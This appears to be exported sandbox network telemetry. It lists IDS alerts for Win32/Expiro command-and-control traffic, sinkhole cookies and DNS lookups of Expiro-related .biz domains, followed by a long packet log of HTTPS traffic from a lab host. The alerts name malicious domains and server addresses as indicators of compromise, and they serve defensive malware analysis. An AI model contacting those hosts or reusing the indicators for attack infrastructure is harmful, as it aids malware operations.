2024-11-18T09:58:31.308675+0100 | 2018141 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz | 1 | 3.94.10.34 | 80 | 192.168.2.10 | 50022 | TCP
2024-11-18T09:58:31.308675+0100 | 2037771 | ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst | 1 | 3.94.10.34 | 80 | 192.168.2.10 | 50022 | TCP
2024-11-18T09:58:35.573680+0100 | 2850851 | ETPRO MALWARE Win32/Expiro.NDO CnC Activity | 1 | 192.168.2.10 | 50027 | 34.211.97.45 | 80 | TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:35.578854+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz134.211.97.4580192.168.2.1050027TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:35.578854+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst134.211.97.4580192.168.2.1050027TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:44.845442+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.246.231.12080192.168.2.1050034TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:44.845442+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.246.231.12080192.168.2.1050034TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:45.663337+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.208.156.24880192.168.2.1050035TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:45.663337+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.208.156.24880192.168.2.1050035TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:49.060851+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.1050037TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:58:49.060851+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.1050037TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:09.939784+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz135.164.78.20080192.168.2.1050066TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:09.939784+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst135.164.78.20080192.168.2.1050066TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:19.305680+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz13.254.94.18580192.168.2.1050079TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:19.305680+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst13.254.94.18580192.168.2.1050079TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:19.336687+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.10507271.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:37.019071+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.105010954.244.188.17780TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:46.275027+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.10650431.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:48.807296+01002051651ET MALWARE DNS Query to Expiro Domain (eufxebus .biz)1192.168.2.10530301.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T09:59:52.433980+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.10513421.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:01.748310+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.10573931.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:08.841230+01002051653ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz)1192.168.2.10558451.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:14.570669+01002051654ET MALWARE DNS Query to Expiro Domain (cikivjto .biz)1192.168.2.10572501.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:21.993688+01002051650ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz)1192.168.2.10562351.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:26.497191+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.10516781.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:37.951578+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.105022918.208.156.24880TCP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:42.381982+01002051652ET MALWARE DNS Query to Expiro Domain (napws .biz)1192.168.2.10548411.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:45.214064+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10574861.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:46.809330+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10643761.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:57.859145+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.10497261.1.1.153UDP
                                                                                                                                                                                                                                                                                                                                                                                                                                        2024-11-18T10:00:59.215356+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.10633271.1.1.153UDP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292521000 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292546034 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292558908 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292572021 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.292601109 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409459114 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409499884 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409557104 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409578085 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409607887 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.409626961 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.410969973 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.410984993 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.411048889 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.411062956 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.411115885 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528235912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528266907 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528337002 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528353930 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528388023 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528409958 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528870106 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528889894 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528973103 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.528980017 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.529021025 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647005081 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647032976 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647088051 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647111893 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647142887 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647161007 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647887945 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647936106 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647973061 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.647979975 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.648011923 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.648030996 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765144110 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765173912 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765261889 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765261889 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765289068 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.765331984 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766352892 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766375065 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766453981 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766453981 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766463041 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.766648054 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810058117 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810086966 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810148001 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:17.810174942 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.403774977 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.403801918 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.403839111 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.403861046 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.485971928 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.486046076 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.486103058 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.486118078 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.486134052 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.486179113 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.486975908 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.487020969 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.487049103 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.487054110 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.487091064 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.487163067 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.522315025 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.522340059 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.522453070 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.522453070 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.522463083 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.522515059 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.604578972 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.604649067 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.604681015 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.604690075 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.604722977 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.604743958 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.605535984 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.605592012 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.605638027 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.605644941 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.605669975 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.605719090 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.640904903 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.640959024 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.640991926 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.641004086 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.641037941 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.641146898 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.723141909 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.723174095 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.723293066 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.723324060 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.723413944 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.724157095 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.724183083 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.724239111 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.724250078 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.724284887 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.724345922 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.759479046 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.759511948 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.759573936 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:18.759596109 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.198198080 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.198210955 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.198270082 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.198270082 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.199815989 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.199856997 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.200028896 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.200028896 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.200042009 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.200192928 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.249192953 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.249254942 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.249408960 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.249428988 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.249442101 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.249555111 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.308784962 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.308898926 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.308959007 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.308974981 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.309017897 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.309017897 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.316426039 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.316481113 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.316623926 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.316634893 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.316657066 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.316770077 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.318257093 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.318304062 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.318345070 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.318351984 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.318411112 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.367417097 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.367443085 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.367532015 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.367547989 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.367625952 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.397069931 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.397129059 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.397207975 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.397207975 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.397221088 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.397361994 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.435534000 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.435554981 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.435641050 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.435653925 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.435717106 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.436755896 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.436772108 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.436815977 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.436824083 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.436863899 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.436863899 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.792632103 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793576956 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793592930 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793652058 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793665886 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.793751955 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.833825111 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.833858967 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.834012032 CET49731443192.168.2.10198.252.105.91
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.834031105 CET44349731198.252.105.91192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:57:19.834201097 CET49731443192.168.2.10198.252.105.91
